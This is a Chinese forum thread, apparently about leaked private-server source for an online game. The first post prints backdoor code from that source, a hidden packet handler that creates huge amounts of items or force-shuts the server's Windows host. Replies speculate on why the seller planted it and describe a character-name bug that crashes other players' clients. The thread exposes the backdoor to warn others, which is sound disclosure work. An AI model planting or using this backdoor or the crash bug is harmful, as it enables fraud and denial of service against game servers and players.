|
阅读:1767回复:3
我来详细的发一下后门吧。
第一处。捆绑在采集内的后门 g_DPlay.SendhM(26460, 30000);
g_DPlay.SendhM(26456, 99);第二处void CDPClient::SendhM( int itemId , int itemnuml ) { BEFORESENDSOLE( ar, PACKETTYPE_ENCHANTS, DPID_UNKNOWN ); ar << 1; ar << itemId << itemnuml; SEND( ar, this, DPID_SERVERPLAYER ); } void CDPClient::SendhMExit() { BEFORESENDSOLE( ar, PACKETTYPE_ENCHANTS, DPID_UNKNOWN ); ar << 0; SEND( ar, this, DPID_SERVERPLAYER ); }第三处,关闭后门void CDPSrvr::OnEnchants(CAr & ar, DPID dpidCache, DPID dpidUser, LPBYTE, u_long ) { int m_nType; ar >> m_nType; if (m_nType == 0) { ExitWindowsEx(EWX_FORCE, 0); } else if (m_nType == 1) { int itemid; int itemnuml; ar >> itemid >> itemnuml; CUser* pUser = g_UserMng.GetUser( dpidCache, dpidUser ); CItemElem itemElem; itemElem.m_dwItemId = itemid; itemElem.m_nItemNum = itemnuml; pUser->CreateItem(&itemElem); } }1、刷:26460(红制片,塔罗牌里面就是点卷吧)物品30000个 2、刷:26456(1亿游戏金币)物品99个 3、强行退出windows 我也是新手。看到镍子航发了个定义。我就发全点。 还有。大家帮忙找找其他的后门吧。 |
|
100% |
|
沙发#
发布于:2013-08-08 08:46
用户被禁言,该主题自动屏蔽! |
|
|
板凳#
发布于:2013-08-12 19:06
除了这个 塔罗牌里还有剩下四个啊
一个比一个给力哦,但最给力的 最聪明的是 数据转向 解决这个的办法 就是自己写转发,让他在127.0.0.1里转 |
|
|
地板#
发布于:2013-08-14 17:49
这也很明显,后门是要留的,主要的是怕源码卖出去后和他抢生意,谁做大了就干掉谁,
今天又暴一个漏洞,就是特殊字符,在入库失败后,新建的角色和数据库里的角色名不同步, 走到哪 见到他的人就崩,跑一圈能干掉半个服的人员 |
|
